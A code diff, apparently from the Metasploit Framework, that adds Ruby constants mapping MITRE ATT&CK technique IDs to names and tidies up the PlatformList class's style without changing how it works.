+        T1216_001_PUBPRN = 'T1216.001'
+        T1216_002_SYNCAPPVPUBLISHINGSERVER = 'T1216.002'
+
+        T1217_BROWSER_INFORMATION_DISCOVERY = 'T1217'
+
+        T1218_SYSTEM_BINARY_PROXY_EXECUTION = 'T1218'
+        T1218_001_COMPILED_HTML_FILE = 'T1218.001'
+        T1218_002_CONTROL_PANEL = 'T1218.002'
+        T1218_003_CMSTP = 'T1218.003'
+        T1218_004_INSTALLUTIL = 'T1218.004'
+        T1218_005_MSHTA = 'T1218.005'
+        T1218_007_MSIEXEC = 'T1218.007'
+        T1218_008_ODBCCONF = 'T1218.008'
+        T1218_009_REGSVCS_REGASM = 'T1218.009'
+        T1218_010_REGSVR32 = 'T1218.010'
+        T1218_011_RUNDLL32 = 'T1218.011'
+        T1218_012_VERCLSID = 'T1218.012'
+        T1218_013_MAVINJECT = 'T1218.013'
+        T1218_014_MMC = 'T1218.014'
+        T1218_015_ELECTRON_APPLICATIONS = 'T1218.015'
+
+        T1219_REMOTE_ACCESS_TOOLS = 'T1219'
+        T1219_001_IDE_TUNNELING = 'T1219.001'
+        T1219_002_REMOTE_DESKTOP_SOFTWARE = 'T1219.002'
+        T1219_003_REMOTE_ACCESS_HARDWARE = 'T1219.003'
+
+        T1220_XSL_SCRIPT_PROCESSING = 'T1220'
+
+        T1221_TEMPLATE_INJECTION = 'T1221'
+
+        T1222_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION = 'T1222'
+        T1222_001_WINDOWS_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION = 'T1222.001'
+        T1222_002_LINUX_AND_MAC_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION = 'T1222.002'
+
+        T1223_COMPILED_HTML_FILE = 'T1223'
+
+        T1480_EXECUTION_GUARDRAILS = 'T1480'
+        T1480_001_ENVIRONMENTAL_KEYING = 'T1480.001'
+        T1480_002_MUTUAL_EXCLUSION = 'T1480.002'
+
+        T1482_DOMAIN_TRUST_DISCOVERY = 'T1482'
+
+        T1483_DOMAIN_GENERATION_ALGORITHMS = 'T1483'
+
+        T1484_DOMAIN_OR_TENANT_POLICY_MODIFICATION = 'T1484'
+        T1484_001_GROUP_POLICY_MODIFICATION = 'T1484.001'
+        T1484_002_TRUST_MODIFICATION = 'T1484.002'
+
+        T1485_DATA_DESTRUCTION = 'T1485'
+        T1485_001_LIFECYCLE_TRIGGERED_DELETION = 'T1485.001'
+
+        T1486_DATA_ENCRYPTED_FOR_IMPACT = 'T1486'
+
+        T1487_DISK_STRUCTURE_WIPE = 'T1487'
+
+        T1488_DISK_CONTENT_WIPE = 'T1488'
+
+        T1489_SERVICE_STOP = 'T1489'
+
+        T1490_INHIBIT_SYSTEM_RECOVERY = 'T1490'
+
+        T1491_DEFACEMENT = 'T1491'
+        T1491_001_INTERNAL_DEFACEMENT = 'T1491.001'
+        T1491_002_EXTERNAL_DEFACEMENT = 'T1491.002'
+
+        T1492_STORED_DATA_MANIPULATION = 'T1492'
+
+        T1493_TRANSMITTED_DATA_MANIPULATION = 'T1493'
+
+        T1494_RUNTIME_DATA_MANIPULATION = 'T1494'
+
+        T1495_FIRMWARE_CORRUPTION = 'T1495'
+
+        T1496_RESOURCE_HIJACKING = 'T1496'
+        T1496_001_COMPUTE_HIJACKING = 'T1496.001'
+        T1496_002_BANDWIDTH_HIJACKING = 'T1496.002'
+        T1496_003_SMS_PUMPING = 'T1496.003'
+        T1496_004_CLOUD_SERVICE_HIJACKING = 'T1496.004'
+
+        T1497_VIRTUALIZATION_SANDBOX_EVASION = 'T1497'
+        T1497_001_SYSTEM_CHECKS = 'T1497.001'
+        T1497_002_USER_ACTIVITY_BASED_CHECKS = 'T1497.002'
+        T1497_003_TIME_BASED_EVASION = 'T1497.003'
+
+        T1498_NETWORK_DENIAL_OF_SERVICE = 'T1498'
+        T1498_001_DIRECT_NETWORK_FLOOD = 'T1498.001'
+        T1498_002_REFLECTION_AMPLIFICATION = 'T1498.002'
+
+        T1499_ENDPOINT_DENIAL_OF_SERVICE = 'T1499'
+        T1499_001_OS_EXHAUSTION_FLOOD = 'T1499.001'
+        T1499_002_SERVICE_EXHAUSTION_FLOOD = 'T1499.002'
+        T1499_003_APPLICATION_EXHAUSTION_FLOOD = 'T1499.003'
+        T1499_004_APPLICATION_OR_SYSTEM_EXPLOITATION = 'T1499.004'
+
+        T1500_COMPILE_AFTER_DELIVERY = 'T1500'
+
+        T1501_SYSTEMD_SERVICE = 'T1501'
+
+        T1502_PARENT_PID_SPOOFING = 'T1502'
+
+        T1503_CREDENTIALS_FROM_WEB_BROWSERS = 'T1503'
+
+        T1504_POWERSHELL_PROFILE = 'T1504'
+
+        T1505_SERVER_SOFTWARE_COMPONENT = 'T1505'
+        T1505_001_SQL_STORED_PROCEDURES = 'T1505.001'
+        T1505_002_TRANSPORT_AGENT = 'T1505.002'
+        T1505_003_WEB_SHELL = 'T1505.003'
+        T1505_004_IIS_COMPONENTS = 'T1505.004'
+        T1505_005_TERMINAL_SERVICES_DLL = 'T1505.005'
+        T1505_006_VSPHERE_INSTALLATION_BUNDLES = 'T1505.006'
+
+        T1506_WEB_SESSION_COOKIE = 'T1506'
+
+        T1514_ELEVATED_EXECUTION_WITH_PROMPT = 'T1514'
+
+        T1518_SOFTWARE_DISCOVERY = 'T1518'
+        T1518_001_SECURITY_SOFTWARE_DISCOVERY = 'T1518.001'
+
+        T1519_EMOND = 'T1519'
+
+        T1522_CLOUD_INSTANCE_METADATA_API = 'T1522'
+
+        T1525_IMPLANT_INTERNAL_IMAGE = 'T1525'
+
+        T1526_CLOUD_SERVICE_DISCOVERY = 'T1526'
+
+        T1527_APPLICATION_ACCESS_TOKEN = 'T1527'
+
+        T1528_STEAL_APPLICATION_ACCESS_TOKEN = 'T1528'
+
+        T1529_SYSTEM_SHUTDOWN_REBOOT = 'T1529'
+
+        T1530_DATA_FROM_CLOUD_STORAGE = 'T1530'
+
+        T1531_ACCOUNT_ACCESS_REMOVAL = 'T1531'
+
+        T1534_INTERNAL_SPEARPHISHING = 'T1534'
+
+        T1535_UNUSED_UNSUPPORTED_CLOUD_REGIONS = 'T1535'
+
+        T1536_REVERT_CLOUD_INSTANCE = 'T1536'
+
+        T1537_TRANSFER_DATA_TO_CLOUD_ACCOUNT = 'T1537'
+
+        T1538_CLOUD_SERVICE_DASHBOARD = 'T1538'
+
+        T1539_STEAL_WEB_SESSION_COOKIE = 'T1539'
+
+        T1542_PRE_OS_BOOT = 'T1542'
+        T1542_001_SYSTEM_FIRMWARE = 'T1542.001'
+        T1542_002_COMPONENT_FIRMWARE = 'T1542.002'
+        T1542_003_BOOTKIT = 'T1542.003'
+        T1542_004_ROMMONKIT = 'T1542.004'
+        T1542_005_TFTP_BOOT = 'T1542.005'
+
+        T1543_CREATE_OR_MODIFY_SYSTEM_PROCESS = 'T1543'
+        T1543_001_LAUNCH_AGENT = 'T1543.001'
+        T1543_002_SYSTEMD_SERVICE = 'T1543.002'
+        T1543_003_WINDOWS_SERVICE = 'T1543.003'
+        T1543_004_LAUNCH_DAEMON = 'T1543.004'
+        T1543_005_CONTAINER_SERVICE = 'T1543.005'
+
+        T1546_EVENT_TRIGGERED_EXECUTION = 'T1546'
+        T1546_001_CHANGE_DEFAULT_FILE_ASSOCIATION = 'T1546.001'
+        T1546_002_SCREENSAVER = 'T1546.002'
+        T1546_003_WINDOWS_MANAGEMENT_INSTRUMENTATION_EVENT_SUBSCRIPTION = 'T1546.003'
+        T1546_004_UNIX_SHELL_CONFIGURATION_MODIFICATION = 'T1546.004'
+        T1546_005_TRAP = 'T1546.005'
+        T1546_006_LC_LOAD_DYLIB_ADDITION = 'T1546.006'
+        T1546_007_NETSH_HELPER_DLL = 'T1546.007'
+        T1546_008_ACCESSIBILITY_FEATURES = 'T1546.008'
+        T1546_009_APPCERT_DLLS = 'T1546.009'
+        T1546_010_APPINIT_DLLS = 'T1546.010'
+        T1546_011_APPLICATION_SHIMMING = 'T1546.011'
+        T1546_012_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION = 'T1546.012'
+        T1546_013_POWERSHELL_PROFILE = 'T1546.013'
+        T1546_014_EMOND = 'T1546.014'
+        T1546_015_COMPONENT_OBJECT_MODEL_HIJACKING = 'T1546.015'
+        T1546_016_INSTALLER_PACKAGES = 'T1546.016'
+        T1546_017_UDEV_RULES = 'T1546.017'
+
+        T1547_BOOT_OR_LOGON_AUTOSTART_EXECUTION = 'T1547'
+        T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER = 'T1547.001'
+        T1547_002_AUTHENTICATION_PACKAGE = 'T1547.002'
+        T1547_003_TIME_PROVIDERS = 'T1547.003'
+        T1547_004_WINLOGON_HELPER_DLL = 'T1547.004'
+        T1547_005_SECURITY_SUPPORT_PROVIDER = 'T1547.005'
+        T1547_006_KERNEL_MODULES_AND_EXTENSIONS = 'T1547.006'
+        T1547_007_RE_OPENED_APPLICATIONS = 'T1547.007'
+        T1547_008_LSASS_DRIVER = 'T1547.008'
+        T1547_009_SHORTCUT_MODIFICATION = 'T1547.009'
+        T1547_010_PORT_MONITORS = 'T1547.010'
+        T1547_011_PLIST_MODIFICATION = 'T1547.011'
+        T1547_012_PRINT_PROCESSORS = 'T1547.012'
+        T1547_013_XDG_AUTOSTART_ENTRIES = 'T1547.013'
+        T1547_014_ACTIVE_SETUP = 'T1547.014'
+        T1547_015_LOGIN_ITEMS = 'T1547.015'
+
+        T1548_ABUSE_ELEVATION_CONTROL_MECHANISM = 'T1548'
+        T1548_001_SETUID_AND_SETGID = 'T1548.001'
+        T1548_002_BYPASS_USER_ACCOUNT_CONTROL = 'T1548.002'
+        T1548_003_SUDO_AND_SUDO_CACHING = 'T1548.003'
+        T1548_004_ELEVATED_EXECUTION_WITH_PROMPT = 'T1548.004'
+        T1548_005_TEMPORARY_ELEVATED_CLOUD_ACCESS = 'T1548.005'
+        T1548_006_TCC_MANIPULATION = 'T1548.006'
+
+        T1550_USE_ALTERNATE_AUTHENTICATION_MATERIAL = 'T1550'
+        T1550_001_APPLICATION_ACCESS_TOKEN = 'T1550.001'
+        T1550_002_PASS_THE_HASH = 'T1550.002'
+        T1550_003_PASS_THE_TICKET = 'T1550.003'
+        T1550_004_WEB_SESSION_COOKIE = 'T1550.004'
+
+        T1552_UNSECURED_CREDENTIALS = 'T1552'
+        T1552_001_CREDENTIALS_IN_FILES = 'T1552.001'
+        T1552_002_CREDENTIALS_IN_REGISTRY = 'T1552.002'
+        T1552_003_BASH_HISTORY = 'T1552.003'
+        T1552_004_PRIVATE_KEYS = 'T1552.004'
+        T1552_005_CLOUD_INSTANCE_METADATA_API = 'T1552.005'
+        T1552_006_GROUP_POLICY_PREFERENCES = 'T1552.006'
+        T1552_007_CONTAINER_API = 'T1552.007'
+        T1552_008_CHAT_MESSAGES = 'T1552.008'
+
+        T1553_SUBVERT_TRUST_CONTROLS = 'T1553'
+        T1553_001_GATEKEEPER_BYPASS = 'T1553.001'
+        T1553_002_CODE_SIGNING = 'T1553.002'
+        T1553_003_SIP_AND_TRUST_PROVIDER_HIJACKING = 'T1553.003'
+        T1553_004_INSTALL_ROOT_CERTIFICATE = 'T1553.004'
+        T1553_005_MARK_OF_THE_WEB_BYPASS = 'T1553.005'
+        T1553_006_CODE_SIGNING_POLICY_MODIFICATION = 'T1553.006'
+
+        T1554_COMPROMISE_HOST_SOFTWARE_BINARY = 'T1554'
+
+        T1555_CREDENTIALS_FROM_PASSWORD_STORES = 'T1555'
+        T1555_001_KEYCHAIN = 'T1555.001'
+        T1555_002_SECURITYD_MEMORY = 'T1555.002'
+        T1555_003_CREDENTIALS_FROM_WEB_BROWSERS = 'T1555.003'
+        T1555_004_WINDOWS_CREDENTIAL_MANAGER = 'T1555.004'
+        T1555_005_PASSWORD_MANAGERS = 'T1555.005'
+        T1555_006_CLOUD_SECRETS_MANAGEMENT_STORES = 'T1555.006'
+
+        T1556_MODIFY_AUTHENTICATION_PROCESS = 'T1556'
+        T1556_001_DOMAIN_CONTROLLER_AUTHENTICATION = 'T1556.001'
+        T1556_002_PASSWORD_FILTER_DLL = 'T1556.002'
+        T1556_003_PLUGGABLE_AUTHENTICATION_MODULES = 'T1556.003'
+        T1556_004_NETWORK_DEVICE_AUTHENTICATION = 'T1556.004'
+        T1556_005_REVERSIBLE_ENCRYPTION = 'T1556.005'
+        T1556_006_MULTI_FACTOR_AUTHENTICATION = 'T1556.006'
+        T1556_007_HYBRID_IDENTITY = 'T1556.007'
+        T1556_008_NETWORK_PROVIDER_DLL = 'T1556.008'
+        T1556_009_CONDITIONAL_ACCESS_POLICIES = 'T1556.009'
+
+        T1557_ADVERSARY_IN_THE_MIDDLE = 'T1557'
+        T1557_001_LLMNR_NBT_NS_POISONING_AND_SMB_RELAY = 'T1557.001'
+        T1557_002_ARP_CACHE_POISONING = 'T1557.002'
+        T1557_003_DHCP_SPOOFING = 'T1557.003'
+        T1557_004_EVIL_TWIN = 'T1557.004'
+
+        T1558_STEAL_OR_FORGE_KERBEROS_TICKETS = 'T1558'
+        T1558_001_GOLDEN_TICKET = 'T1558.001'
+        T1558_002_SILVER_TICKET = 'T1558.002'
+        T1558_003_KERBEROASTING = 'T1558.003'
+        T1558_004_AS_REP_ROASTING = 'T1558.004'
+        T1558_005_CCACHE_FILES = 'T1558.005'
+
+        T1559_INTER_PROCESS_COMMUNICATION = 'T1559'
+        T1559_001_COMPONENT_OBJECT_MODEL = 'T1559.001'
+        T1559_002_DYNAMIC_DATA_EXCHANGE = 'T1559.002'
+        T1559_003_XPC_SERVICES = 'T1559.003'
+
+        T1560_ARCHIVE_COLLECTED_DATA = 'T1560'
+        T1560_001_ARCHIVE_VIA_UTILITY = 'T1560.001'
+        T1560_002_ARCHIVE_VIA_LIBRARY = 'T1560.002'
+        T1560_003_ARCHIVE_VIA_CUSTOM_METHOD = 'T1560.003'
+
+        T1561_DISK_WIPE = 'T1561'
+        T1561_001_DISK_CONTENT_WIPE = 'T1561.001'
+        T1561_002_DISK_STRUCTURE_WIPE = 'T1561.002'
+
+        T1562_IMPAIR_DEFENSES = 'T1562'
+        T1562_001_DISABLE_OR_MODIFY_TOOLS = 'T1562.001'
+        T1562_002_DISABLE_WINDOWS_EVENT_LOGGING = 'T1562.002'
+        T1562_003_IMPAIR_COMMAND_HISTORY_LOGGING = 'T1562.003'
+        T1562_004_DISABLE_OR_MODIFY_SYSTEM_FIREWALL = 'T1562.004'
+        T1562_006_INDICATOR_BLOCKING = 'T1562.006'
+        T1562_007_DISABLE_OR_MODIFY_CLOUD_FIREWALL = 'T1562.007'
+        T1562_008_DISABLE_OR_MODIFY_CLOUD_LOGS = 'T1562.008'
+        T1562_009_SAFE_MODE_BOOT = 'T1562.009'
+        T1562_010_DOWNGRADE_ATTACK = 'T1562.010'
+        T1562_011_SPOOF_SECURITY_ALERTING = 'T1562.011'
+        T1562_012_DISABLE_OR_MODIFY_LINUX_AUDIT_SYSTEM = 'T1562.012'
+
+        T1563_REMOTE_SERVICE_SESSION_HIJACKING = 'T1563'
+        T1563_001_SSH_HIJACKING = 'T1563.001'
+        T1563_002_RDP_HIJACKING = 'T1563.002'
+
+        T1564_HIDE_ARTIFACTS = 'T1564'
+        T1564_001_HIDDEN_FILES_AND_DIRECTORIES = 'T1564.001'
+        T1564_002_HIDDEN_USERS = 'T1564.002'
+        T1564_003_HIDDEN_WINDOW = 'T1564.003'
+        T1564_004_NTFS_FILE_ATTRIBUTES = 'T1564.004'
+        T1564_005_HIDDEN_FILE_SYSTEM = 'T1564.005'
+        T1564_006_RUN_VIRTUAL_INSTANCE = 'T1564.006'
+        T1564_007_VBA_STOMPING = 'T1564.007'
+        T1564_008_EMAIL_HIDING_RULES = 'T1564.008'
+        T1564_009_RESOURCE_FORKING = 'T1564.009'
+        T1564_010_PROCESS_ARGUMENT_SPOOFING = 'T1564.010'
+        T1564_011_IGNORE_PROCESS_INTERRUPTS = 'T1564.011'
+        T1564_012_FILE_PATH_EXCLUSIONS = 'T1564.012'
+        T1564_013_BIND_MOUNTS = 'T1564.013'
+        T1564_014_EXTENDED_ATTRIBUTES = 'T1564.014'
+
+        T1565_DATA_MANIPULATION = 'T1565'
+        T1565_001_STORED_DATA_MANIPULATION = 'T1565.001'
+        T1565_002_TRANSMITTED_DATA_MANIPULATION = 'T1565.002'
+        T1565_003_RUNTIME_DATA_MANIPULATION = 'T1565.003'
+
+        T1566_PHISHING = 'T1566'
+        T1566_001_SPEARPHISHING_ATTACHMENT = 'T1566.001'
+        T1566_002_SPEARPHISHING_LINK = 'T1566.002'
+        T1566_003_SPEARPHISHING_VIA_SERVICE = 'T1566.003'
+        T1566_004_SPEARPHISHING_VOICE = 'T1566.004'
+
+        T1567_EXFILTRATION_OVER_WEB_SERVICE = 'T1567'
+        T1567_001_EXFILTRATION_TO_CODE_REPOSITORY = 'T1567.001'
+        T1567_002_EXFILTRATION_TO_CLOUD_STORAGE = 'T1567.002'
+        T1567_003_EXFILTRATION_TO_TEXT_STORAGE_SITES = 'T1567.003'
+        T1567_004_EXFILTRATION_OVER_WEBHOOK = 'T1567.004'
+
+        T1568_DYNAMIC_RESOLUTION = 'T1568'
+        T1568_001_FAST_FLUX_DNS = 'T1568.001'
+        T1568_002_DOMAIN_GENERATION_ALGORITHMS = 'T1568.002'
+        T1568_003_DNS_CALCULATION = 'T1568.003'
+
+        T1569_SYSTEM_SERVICES = 'T1569'
+        T1569_001_LAUNCHCTL = 'T1569.001'
+        T1569_002_SERVICE_EXECUTION = 'T1569.002'
+        T1569_003_SYSTEMCTL = 'T1569.003'
+
+        T1570_LATERAL_TOOL_TRANSFER = 'T1570'
+
+        T1571_NON_STANDARD_PORT = 'T1571'
+
+        T1572_PROTOCOL_TUNNELING = 'T1572'
+
+        T1573_ENCRYPTED_CHANNEL = 'T1573'
+        T1573_001_SYMMETRIC_CRYPTOGRAPHY = 'T1573.001'
+        T1573_002_ASYMMETRIC_CRYPTOGRAPHY = 'T1573.002'
+
+        T1574_HIJACK_EXECUTION_FLOW = 'T1574'
+        T1574_001_DLL = 'T1574.001'
+        T1574_002_DLL_SIDE_LOADING = 'T1574.002'
+        T1574_004_DYLIB_HIJACKING = 'T1574.004'
+        T1574_005_EXECUTABLE_INSTALLER_FILE_PERMISSIONS_WEAKNESS = 'T1574.005'
+        T1574_006_DYNAMIC_LINKER_HIJACKING = 'T1574.006'
+        T1574_007_PATH_INTERCEPTION_BY_PATH_ENVIRONMENT_VARIABLE = 'T1574.007'
+        T1574_008_PATH_INTERCEPTION_BY_SEARCH_ORDER_HIJACKING = 'T1574.008'
+        T1574_009_PATH_INTERCEPTION_BY_UNQUOTED_PATH = 'T1574.009'
+        T1574_010_SERVICES_FILE_PERMISSIONS_WEAKNESS = 'T1574.010'
+        T1574_011_SERVICES_REGISTRY_PERMISSIONS_WEAKNESS = 'T1574.011'
+        T1574_012_COR_PROFILER = 'T1574.012'
+        T1574_013_KERNELCALLBACKTABLE = 'T1574.013'
+        T1574_014_APPDOMAINMANAGER = 'T1574.014'
+
+        T1578_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE = 'T1578'
+        T1578_001_CREATE_SNAPSHOT = 'T1578.001'
+        T1578_002_CREATE_CLOUD_INSTANCE = 'T1578.002'
+        T1578_003_DELETE_CLOUD_INSTANCE = 'T1578.003'
+        T1578_004_REVERT_CLOUD_INSTANCE = 'T1578.004'
+        T1578_005_MODIFY_CLOUD_COMPUTE_CONFIGURATIONS = 'T1578.005'
+
+        T1580_CLOUD_INFRASTRUCTURE_DISCOVERY = 'T1580'
+
+        T1583_ACQUIRE_INFRASTRUCTURE = 'T1583'
+        T1583_001_DOMAINS = 'T1583.001'
+        T1583_002_DNS_SERVER = 'T1583.002'
+        T1583_003_VIRTUAL_PRIVATE_SERVER = 'T1583.003'
+        T1583_004_SERVER = 'T1583.004'
+        T1583_005_BOTNET = 'T1583.005'
+        T1583_006_WEB_SERVICES = 'T1583.006'
+        T1583_007_SERVERLESS = 'T1583.007'
+        T1583_008_MALVERTISING = 'T1583.008'
+
+        T1584_COMPROMISE_INFRASTRUCTURE = 'T1584'
+        T1584_001_DOMAINS = 'T1584.001'
+        T1584_002_DNS_SERVER = 'T1584.002'
+        T1584_003_VIRTUAL_PRIVATE_SERVER = 'T1584.003'
+        T1584_004_SERVER = 'T1584.004'
+        T1584_005_BOTNET = 'T1584.005'
+        T1584_006_WEB_SERVICES = 'T1584.006'
+        T1584_007_SERVERLESS = 'T1584.007'
+        T1584_008_NETWORK_DEVICES = 'T1584.008'
+
+        T1585_ESTABLISH_ACCOUNTS = 'T1585'
+        T1585_001_SOCIAL_MEDIA_ACCOUNTS = 'T1585.001'
+        T1585_002_EMAIL_ACCOUNTS = 'T1585.002'
+        T1585_003_CLOUD_ACCOUNTS = 'T1585.003'
+
+        T1586_COMPROMISE_ACCOUNTS = 'T1586'
+        T1586_001_SOCIAL_MEDIA_ACCOUNTS = 'T1586.001'
+        T1586_002_EMAIL_ACCOUNTS = 'T1586.002'
+        T1586_003_CLOUD_ACCOUNTS = 'T1586.003'
+
+        T1587_DEVELOP_CAPABILITIES = 'T1587'
+        T1587_001_MALWARE = 'T1587.001'
+        T1587_002_CODE_SIGNING_CERTIFICATES = 'T1587.002'
+        T1587_003_DIGITAL_CERTIFICATES = 'T1587.003'
+        T1587_004_EXPLOITS = 'T1587.004'
+
+        T1588_OBTAIN_CAPABILITIES = 'T1588'
+        T1588_001_MALWARE = 'T1588.001'
+        T1588_002_TOOL = 'T1588.002'
+        T1588_003_CODE_SIGNING_CERTIFICATES = 'T1588.003'
+        T1588_004_DIGITAL_CERTIFICATES = 'T1588.004'
+        T1588_005_EXPLOITS = 'T1588.005'
+        T1588_006_VULNERABILITIES = 'T1588.006'
+        T1588_007_ARTIFICIAL_INTELLIGENCE = 'T1588.007'
+
+        T1589_GATHER_VICTIM_IDENTITY_INFORMATION = 'T1589'
+        T1589_001_CREDENTIALS = 'T1589.001'
+        T1589_002_EMAIL_ADDRESSES = 'T1589.002'
+        T1589_003_EMPLOYEE_NAMES = 'T1589.003'
+
+        T1590_GATHER_VICTIM_NETWORK_INFORMATION = 'T1590'
+        T1590_001_DOMAIN_PROPERTIES = 'T1590.001'
+        T1590_002_DNS = 'T1590.002'
+        T1590_003_NETWORK_TRUST_DEPENDENCIES = 'T1590.003'
+        T1590_004_NETWORK_TOPOLOGY = 'T1590.004'
+        T1590_005_IP_ADDRESSES = 'T1590.005'
+        T1590_006_NETWORK_SECURITY_APPLIANCES = 'T1590.006'
+
+        T1591_GATHER_VICTIM_ORG_INFORMATION = 'T1591'
+        T1591_001_DETERMINE_PHYSICAL_LOCATIONS = 'T1591.001'
+        T1591_002_BUSINESS_RELATIONSHIPS = 'T1591.002'
+        T1591_003_IDENTIFY_BUSINESS_TEMPO = 'T1591.003'
+        T1591_004_IDENTIFY_ROLES = 'T1591.004'
+
+        T1592_GATHER_VICTIM_HOST_INFORMATION = 'T1592'
+        T1592_001_HARDWARE = 'T1592.001'
+        T1592_002_SOFTWARE = 'T1592.002'
+        T1592_003_FIRMWARE = 'T1592.003'
+        T1592_004_CLIENT_CONFIGURATIONS = 'T1592.004'
+
+        T1593_SEARCH_OPEN_WEBSITES_DOMAINS = 'T1593'
+        T1593_001_SOCIAL_MEDIA = 'T1593.001'
+        T1593_002_SEARCH_ENGINES = 'T1593.002'
+        T1593_003_CODE_REPOSITORIES = 'T1593.003'
+
+        T1594_SEARCH_VICTIM_OWNED_WEBSITES = 'T1594'
+
+        T1595_ACTIVE_SCANNING = 'T1595'
+        T1595_001_SCANNING_IP_BLOCKS = 'T1595.001'
+        T1595_002_VULNERABILITY_SCANNING = 'T1595.002'
+        T1595_003_WORDLIST_SCANNING = 'T1595.003'
+
+        T1596_SEARCH_OPEN_TECHNICAL_DATABASES = 'T1596'
+        T1596_001_DNS_PASSIVE_DNS = 'T1596.001'
+        T1596_002_WHOIS = 'T1596.002'
+        T1596_003_DIGITAL_CERTIFICATES = 'T1596.003'
+        T1596_004_CDNS = 'T1596.004'
+        T1596_005_SCAN_DATABASES = 'T1596.005'
+
+        T1597_SEARCH_CLOSED_SOURCES = 'T1597'
+        T1597_001_THREAT_INTEL_VENDORS = 'T1597.001'
+        T1597_002_PURCHASE_TECHNICAL_DATA = 'T1597.002'
+
+        T1598_PHISHING_FOR_INFORMATION = 'T1598'
+        T1598_001_SPEARPHISHING_SERVICE = 'T1598.001'
+        T1598_002_SPEARPHISHING_ATTACHMENT = 'T1598.002'
+        T1598_003_SPEARPHISHING_LINK = 'T1598.003'
+        T1598_004_SPEARPHISHING_VOICE = 'T1598.004'
+
+        T1599_NETWORK_BOUNDARY_BRIDGING = 'T1599'
+        T1599_001_NETWORK_ADDRESS_TRANSLATION_TRAVERSAL = 'T1599.001'
+
+        T1600_WEAKEN_ENCRYPTION = 'T1600'
+        T1600_001_REDUCE_KEY_SPACE = 'T1600.001'
+        T1600_002_DISABLE_CRYPTO_HARDWARE = 'T1600.002'
+
+        T1601_MODIFY_SYSTEM_IMAGE = 'T1601'
+        T1601_001_PATCH_SYSTEM_IMAGE = 'T1601.001'
+        T1601_002_DOWNGRADE_SYSTEM_IMAGE = 'T1601.002'
+
+        T1602_DATA_FROM_CONFIGURATION_REPOSITORY = 'T1602'
+        T1602_001_SNMP_MIB_DUMP = 'T1602.001'
+        T1602_002_NETWORK_DEVICE_CONFIGURATION_DUMP = 'T1602.002'
+
+        T1606_FORGE_WEB_CREDENTIALS = 'T1606'
+        T1606_001_WEB_COOKIES = 'T1606.001'
+        T1606_002_SAML_TOKENS = 'T1606.002'
+
+        T1608_STAGE_CAPABILITIES = 'T1608'
+        T1608_001_UPLOAD_MALWARE = 'T1608.001'
+        T1608_002_UPLOAD_TOOL = 'T1608.002'
+        T1608_003_INSTALL_DIGITAL_CERTIFICATE = 'T1608.003'
+        T1608_004_DRIVE_BY_TARGET = 'T1608.004'
+        T1608_005_LINK_TARGET = 'T1608.005'
+        T1608_006_SEO_POISONING = 'T1608.006'
+
+        T1609_CONTAINER_ADMINISTRATION_COMMAND = 'T1609'
+
+        T1610_DEPLOY_CONTAINER = 'T1610'
+
+        T1611_ESCAPE_TO_HOST = 'T1611'
+
+        T1612_BUILD_IMAGE_ON_HOST = 'T1612'
+
+        T1613_CONTAINER_AND_RESOURCE_DISCOVERY = 'T1613'
+
+        T1614_SYSTEM_LOCATION_DISCOVERY = 'T1614'
+        T1614_001_SYSTEM_LANGUAGE_DISCOVERY = 'T1614.001'
+
+        T1615_GROUP_POLICY_DISCOVERY = 'T1615'
+
+        T1619_CLOUD_STORAGE_OBJECT_DISCOVERY = 'T1619'
+
+        T1620_REFLECTIVE_CODE_LOADING = 'T1620'
+
+        T1621_MULTI_FACTOR_AUTHENTICATION_REQUEST_GENERATION = 'T1621'
+
+        T1622_DEBUGGER_EVASION = 'T1622'
+
+        T1647_PLIST_FILE_MODIFICATION = 'T1647'
+
+        T1648_SERVERLESS_EXECUTION = 'T1648'
+
+        T1649_STEAL_OR_FORGE_AUTHENTICATION_CERTIFICATES = 'T1649'
+
+        T1650_ACQUIRE_ACCESS = 'T1650'
+
+        T1651_CLOUD_ADMINISTRATION_COMMAND = 'T1651'
+
+        T1652_DEVICE_DRIVER_DISCOVERY = 'T1652'
+
+        T1653_POWER_SETTINGS = 'T1653'
+
+        T1654_LOG_ENUMERATION = 'T1654'
+
+        T1656_IMPERSONATION = 'T1656'
+
+        T1657_FINANCIAL_THEFT = 'T1657'
+
+        T1659_CONTENT_INJECTION = 'T1659'
+
+        T1665_HIDE_INFRASTRUCTURE = 'T1665'
+
+        T1666_MODIFY_CLOUD_RESOURCE_HIERARCHY = 'T1666'
+
+        T1667_EMAIL_BOMBING = 'T1667'
+
+        T1668_EXCLUSIVE_CONTROL = 'T1668'
+
+        T1669_WI_FI_NETWORKS = 'T1669'
+
+        T1671_CLOUD_APPLICATION_INTEGRATION = 'T1671'
+
+        T1672_EMAIL_SPOOFING = 'T1672'
+
+        T1673_VIRTUAL_MACHINE_DISCOVERY = 'T1673'
+
+        T1674_INPUT_INJECTION = 'T1674'
+
+        T1675_ESXI_ADMINISTRATION_COMMAND = 'T1675'
+      end
+    end
+  end
+end
@@ -1,4 +1,3 @@
-#!/usr/bin/env ruby
 # -*- coding: binary -*-

 #
@@ -7,8 +6,6 @@
 # of Msf::Module::Platform objects.  It also supports ranges based on relative
 # ranks...
 #
-
-
 class Msf::Module::PlatformList
  attr_accessor :platforms

@@ -32,88 +29,85 @@ class Msf::Module::PlatformList
  # Create an instance from an array
  #
  def self.from_a(ary)
-    self.new(*ary)
+    new(*ary)
  end

  def index(needle)
-    self.platforms.index(needle)
+    platforms.index(needle)
  end

  #
-  # Constructor, takes the entries are arguments
+  # Constructor, takes the entries as arguments
  #
  def initialize(*args)
-    self.platforms = [ ]
+    self.platforms = []

-    args.each { |a|
-      if a.kind_of?(String)
+    args.each do |a|
+      if a.is_a?(String)
        platforms << Msf::Module::Platform.find_platform(a)
-      elsif a.kind_of?(Range)
-        b = Msf::Module::Platform.find_platform(a.begin)
-        e = Msf::Module::Platform.find_platform(a.end)
+      elsif a.is_a?(Range)
+        a_begin = Msf::Module::Platform.find_platform(a.begin)
+        a_end = Msf::Module::Platform.find_platform(a.end)
+        range = (a_begin::Rank..a_end::Rank)

-        children = b.superclass.find_children
-        r        = (b::Rank .. e::Rank)
-        children.each { |c|
-          platforms << c if r.include?(c::Rank)
-        }
+        a_begin.superclass.find_children.each do |c|
+          platforms << c if range.include?(c::Rank)
+        end
      else
        platforms << a
      end
-
-    }
-
+    end
  end

  #
  # Checks to see if the platform list is empty.
  #
